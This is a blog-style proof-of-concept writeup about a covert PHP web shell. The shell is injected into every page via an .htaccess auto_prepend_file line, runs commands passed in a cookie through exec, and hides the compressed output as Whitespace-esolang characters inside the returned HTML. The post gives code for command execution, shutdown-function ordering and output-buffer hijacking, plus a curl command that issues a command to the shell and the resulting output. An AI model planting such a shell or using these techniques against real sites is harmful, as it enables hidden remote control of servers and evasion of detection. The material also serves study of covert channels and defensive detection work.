Whitespace Esolang Covert Channel / Steganography
I’ve always been a fan of esoteric programming languages (esolangs). These languages are generally made just for fun, mostly in universities or for challenges. Wikipedia describes them as follows:
An esoteric programming language (esolang, in short) is a programming language designed to test the boundaries of computer programming language design, as a proof of concept, or as a joke. The use of esoteric distinguishes these languages from programming languages that working developers use to write software.
You’ve probably seen some of the famous ones, like Brainfuck and the Shakespeare Programming Language. Some months ago I stumbled upon a funny one called “Whitespace”.
About Whitespace esolang
Whitespace is an esolang created by Edwin Brady and Chris Morris at the University of Durham and released in 2003. Its opcodes consist only of spaces, tabs and line feeds. Interesting, huh?
Here’s a sample Hello, World! program in Whitespace (red = spaces, blue = tabs, black = VIM cursor):
This “feature” struck me as a very difficult pattern to detect through computational means: the language natively discards every other character, so a Whitespace program can be merged arbitrarily with any other text... and even some code ;)
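To make the "discards every other character" point concrete, here is a minimal sketch of what an interpreter effectively sees when it is handed mixed text. The function name `sketch_extract_whitespace` is hypothetical and is not part of the PoC.

```php
<?php
// Hypothetical helper: keep only the three characters that are
// meaningful to Whitespace (space, tab, line feed) and drop the rest.
function sketch_extract_whitespace(string $mixed): string
{
    // Everything that is not a space, tab or LF is removed,
    // including carriage returns.
    return (string) preg_replace('/[^ \t\n]/', '', $mixed);
}
```

Whatever survives this filter is the candidate Whitespace program; all the visible text is just noise from the interpreter's point of view.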
I then remembered that HTML is quite forgiving about repeated spaces and tabs when it comes to parsing and rendering, so I should be able to inject Whitespace opcodes into HTML without breaking it and with only minor rendering quirks.
So the weather was crappy, beer was over and I decided to make a covert shell with that.
Creating the covert shell
PHP is one of the most used languages on websites and powers popular platforms like WordPress and MediaWiki. PHP has an output buffering system (ob_start, ob_get_contents, etc.) and a widely abused feature called auto_prepend_file. These would be enough to set up my covert shell.
I quickly spawned two files: one .htaccess to handle my shell injection via auto_prepend_file (a well-known old trick) and one wcc.php to do the magic.
    php_value auto_prepend_file "wcc.php"
This would ensure my shell works on almost any PHP page on the target that is accessible through the browser.
The first thing I had to do was ensure that I got the output buffer after all other possible output buffer handlers had processed it. It’s been quite a while since I left web development, but I did remember register_shutdown_function, which is used to, you know, register functions that will run when the script exits.
I could’ve stopped there, but I wanted to prevent other shutdown functions from winning the race and altering the output after I did. So I did some research and saw that if you call register_shutdown_function from inside a shutdown function, the newly registered function has a high chance of being the last one to run (unless another shutdown function does the same trick).
    function wcc_init() {
        # ... snip ...
        # Register shutdown function that registers a
        # shutdown function as last in chain ;)
        # (unless another shutdown function does the same)
        register_shutdown_function('wcc_shutdown', $cmd_output);
    }//end :: wcc_init
And further down…
    function wcc_shutdown($whitespace_payload) {
        register_shutdown_function('wcc_merge_output', $whitespace_payload); # register last ;)
    }//end :: wcc_shutdown
That took care of ensuring that my wcc_merge_output function runs at the very end of any script.
Now it’s time to play with the output buffer and do the whitespace magic. I’ve placed ob_start in my wcc_init function, which is prepended via .htaccess, so output buffering is enabled as soon as the script starts.
If the magic cookie key is set, it runs the command with exec (for testing purposes; you can change it to whichever method you want), compresses the output with gzdeflate and converts it to Whitespace.
I won’t go through the actual code responsible for converting from ASCII to Whitespace but, FYI, it basically converts each character to binary, pushes each character onto the Whitespace stack, then adds “print char from stack” N times, where N = len(string), and finally adds the “end program” instruction.
You can read more about the internals of the Whitespace language in the tutorial on the official page. If you’re interested, you can check the source code of the wcc_whitespace_print_string function.
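The encoding described above can be sketched roughly as follows. This is not the PoC's wcc_whitespace_print_string; the function names are hypothetical, and pushing the bytes in reverse order (so that popping prints them in the original order) is an assumption about how the stack has to be filled. The opcodes follow the Whitespace tutorial: push is Space Space followed by a sign and binary digits (Space = 0, Tab = 1) ending in LF, "output character" is Tab LF Space Space, and "end program" is LF LF LF.

```php
<?php
// Hypothetical helper: Whitespace "push number" for one byte value.
function sketch_ws_push_byte(int $byte): string
{
    // Binary digits: '0' becomes a space, '1' becomes a tab.
    $bits = strtr(decbin($byte), '01', " \t");
    // [Space][Space] = push, [Space] = positive sign, digits, [LF] = end of number.
    return "  " . " " . $bits . "\n";
}

// Hypothetical helper: build a Whitespace program that prints $data.
function sketch_ws_print_string(string $data): string
{
    $program = '';
    if ($data !== '') {
        // Assumption: push in reverse so the first byte ends up on top of the stack.
        foreach (array_reverse(str_split($data)) as $char) {
            $program .= sketch_ws_push_byte(ord($char));
        }
    }
    // One "output character" instruction per byte: [Tab][LF][Space][Space].
    $program .= str_repeat("\t\n  ", strlen($data));
    // "End program": [LF][LF][LF].
    return $program . "\n\n\n";
}
```

For a single "A" (65, binary 1000001) this yields one push, one print and the terminator, and the result contains nothing but spaces, tabs and line feeds. Binary input such as gzdeflate output works the same way, since every byte is handled as a number between 0 and 255.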
The wcc_init function ended up looking like this:
    function wcc_init() {
        if (
            !isset($_COOKIE[WCC_COOKIE_KEY]) ||
            empty($_COOKIE[WCC_COOKIE_KEY])
        ) return false;
        ob_start();
        $cmd_output = wcc_exec($_COOKIE[WCC_COOKIE_KEY]);
        register_shutdown_function('wcc_shutdown', $cmd_output);
        return true;
    }//end :: wcc_init
When the original script finishes its job and execution is passed to my shutdown function, wcc_merge_output grabs the contents of the output buffer, merges the payload into it, prints the result and exits.
    function wcc_merge_output($whitespace_payload) {
        $page_content = ob_get_contents();
        ob_end_clean();
        # "Sanitize" page content and tokenize
        # ... snip ...
        # Build Content
        $final_content = wcc_build_content($whitespace_tokens, $content_tokens);
        # Show content & exit
        print $final_content;
        exit(0);
    }//end :: wcc_merge_output
The caveat
Of course, nothing comes easy. I decided to test the WCC on a real (if a little old) WordPress install, so I pulled up an old VM that had it installed.
My buffer was being ignored or duplicated, depending on the page. It turns out I had not accounted for the race condition that other code might introduce when handling the output buffer: it was flushing the buffer before I could act. So I created a little trap to prevent others from messing with it.
    # in script start
    global $buffer;

    # in wcc_init()
    # this trap will be called when something
    # tries to display the output buffer
    ob_start("wcc_output_trap");

    # Trap function added
    # Someone tries to output the buffer before us
    # and ... OMG! IT'S A TRAP!
    function wcc_output_trap($current_buffer) {
        global $buffer;
        $buffer .= $current_buffer; # let's save it for later
        return ''; # prevents showing the buffer yet
    }//end :: wcc_output_trap

    # in wcc_merge_output()
    $page_content = $buffer.ob_get_contents(); # now we can show everything
As the documentation for the callback parameter of ob_start says:
The function will be called when the output buffer is flushed (sent) or cleaned (with ob_flush(), ob_clean() or similar function) or when the output buffer is flushed to the browser at the end of the request.
That did the trick.
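The behaviour the trap relies on can be reproduced in isolation. The sketch below is a self-contained variation that uses a small class instead of a global variable; the class name `SketchBufferTrap` and its methods are hypothetical and do not exist in the PoC.

```php
<?php
// Hypothetical stand-alone version of the trap: every chunk that some
// other code tries to flush is stored instead of being sent out.
final class SketchBufferTrap
{
    private string $captured = '';

    public function start(): void
    {
        // The callback runs whenever the buffer is flushed or cleaned.
        ob_start([$this, 'collect']);
    }

    public function collect(string $chunk, int $phase): string
    {
        $this->captured .= $chunk; // save it for later
        return '';                 // send nothing yet
    }

    public function finish(): string
    {
        // Early flushes are in $captured; the rest is still in the buffer.
        $page = $this->captured . ob_get_contents();
        ob_end_clean();
        return $page;
    }
}
```

A quick way to try it: call `start()`, echo something, call `ob_flush()` the way a plugin might, echo something else, and then check that `finish()` returns both pieces in order while nothing was actually sent.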
The sanitization and tokenization process is quite simple.
For content, I first replace all tabs with spaces and place each line in an array, indexed by its line number. Then I remove the line feeds from each line and break the line into tokens separated by spaces.
For whitespace, I just convert a string to an array of characters. Dead simple.
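A minimal sketch of the two tokenizers, following the steps just described. The function names are hypothetical, and dropping the empty tokens produced by runs of spaces is an assumption; the PoC may treat them differently.

```php
<?php
// Hypothetical helper: page content to an array of token lists,
// indexed by line number.
function sketch_tokenize_content(string $html): array
{
    $html = str_replace("\t", ' ', $html);       // tabs become spaces
    $lines = [];
    foreach (explode("\n", $html) as $lineNo => $line) {
        $line = rtrim($line, "\r");              // tolerate CRLF input
        // Assumption: consecutive spaces yield no empty tokens.
        $lines[$lineNo] = preg_split('/ +/', $line, -1, PREG_SPLIT_NO_EMPTY);
    }
    return $lines;
}

// Hypothetical helper: payload to an array of single characters.
function sketch_tokenize_payload(string $whitespace): array
{
    return $whitespace === '' ? [] : str_split($whitespace);
}
```

After this step the page has lost all of its original whitespace, which is what frees up every gap between tokens for the payload.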
Merging content
This is also quite simple. For each whitespace token (character/opcode), I add one of the content parts (tokens) followed by the whitespace token.
If the whitespace payload is shorter than the content, once I finish adding whitespace tokens I just add the remaining pieces glued together by spaces and keep their line feeds.
If the whitespace payload is longer than the content, I just add the raw whitespace payload to the end of the HTML content. This makes detection easier, but it’s better than no output at all. Just choose a page with more content.
You can check out the source code of this routine.
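The merge rules above can be sketched like this. It is not the PoC's wcc_build_content: the function name and signature are hypothetical, "longer than the content" is taken to mean "more payload characters than content tokens", and blank lines in the leftover content are simply dropped to keep the example short.

```php
<?php
// Hypothetical merge routine.
// $payload: list of single whitespace characters.
// $lines:   list of token lists, one per content line.
// $originalHtml: untouched page, used when the payload does not fit.
function sketch_merge(array $payload, array $lines, string $originalHtml): string
{
    // Flatten the content, remembering which tokens end a line.
    $tokens = [];
    foreach ($lines as $lineTokens) {
        $lineTokens = array_values($lineTokens);
        $last = count($lineTokens) - 1;
        foreach ($lineTokens as $i => $token) {
            $tokens[] = [$token, $i === $last];
        }
    }

    // Payload does not fit: append it raw after the original page.
    if (count($payload) > count($tokens)) {
        return $originalHtml . implode('', $payload);
    }

    $out = '';
    foreach ($tokens as $i => [$token, $endsLine]) {
        if ($i < count($payload)) {
            $out .= $token . $payload[$i];               // token + opcode char
        } else {
            $out .= $token . ($endsLine ? "\n" : ' ');   // leftover content
        }
    }
    return $out;
}
```

With a three-character payload and six content tokens, the first three gaps carry the payload and the rest of the page is rebuilt with plain spaces and line feeds.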
Issuing requests to the shell
In this PoC I’ve used the classic Cookie command input trick.
    define('WCC_COOKIE_KEY', 'wcc_cmd');
    $_COOKIE[WCC_COOKIE_KEY];
So through a shell, you can do something like
    curl -s -H 'Cookie: wcc_cmd=id' http://10.1.1.100/wcc/ -o out.html
Then parse with any Whitespace interpreter and inflate the payload again
    ./wspace out.html | head -n -3 | php inflate.php
inflate.php reads input from stdin and passes it to gzinflate.
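The post does not show inflate.php itself, so the following is only a guess at its core, wrapped in a hypothetical function `sketch_inflate` so that the failure case is explicit.

```php
<?php
// Hypothetical core of an inflate.php-style script: undo gzdeflate().
function sketch_inflate(string $raw): string
{
    // gzinflate() returns false (and emits a warning) on invalid input.
    $plain = @gzinflate($raw);
    if ($plain === false) {
        throw new RuntimeException('Input is not a raw DEFLATE stream');
    }
    return $plain;
}
```

In a command-line script this would be fed from standard input, for example with `echo sketch_inflate(stream_get_contents(STDIN));`.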
Result?
    = WCC = Command output ==========================
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    = WCC = EOF =====================================
Visual Differences
For some content you might get some rendering quirks; for other content, none.
Here’s a screenshot of both pages’ sources. The first has the embedded Whitespace command output and the second is the original.
Here’s a screenshot of both pages’ rendered HTML. The first has the embedded Whitespace command output and the second is the original. (Don’t mind the images, this theme has random header images.)
Size discrepancies
Since we’re mostly changing stuff rather than adding it, the file size ends up very close to the original as long as there is enough HTML to fit the command output. Below is a comparison of the original HTML with the pages carrying the output of some commands.
I ran id, ip a show, ps aux and ls -al. id was the only one that fit entirely in the HTML I had (a pretty short page). The others resulted in raw whitespace appended to the end of the original HTML.
    $ ls -al /tmp/{original,cmd*}.html
    -rw-rw-r-- 1 jseidl jseidl 14778 Feb 18 20:47 /tmp/original.html
    -rw-rw-r-- 1 jseidl jseidl 14191 Feb 18 20:36 /tmp/cmd_id.html
    -rw-rw-r-- 1 jseidl jseidl 16986 Feb 18 20:50 /tmp/cmd_ip_a_show.html
    -rw-rw-r-- 1 jseidl jseidl 19013 Feb 18 20:50 /tmp/cmd_ls_al.html
    -rw-rw-r-- 1 jseidl jseidl 41000 Feb 18 20:50 /tmp/cmd_ps_aux.html
LOL. In some cases it even “minifies” a little…
Final notes
- I did not put any effort into encoding/encrypting the cookie or commands or whatever. This is only to test the covert response channel.
- I also know that cookie-based command passing is easily detectable, and that there are many better ways to do it.
- Of course there are better methods than exec to run code. This is also not the point of this research.
Source code & files
All files are available on my GitHub repo. Feel free to download, play, fork, whatever.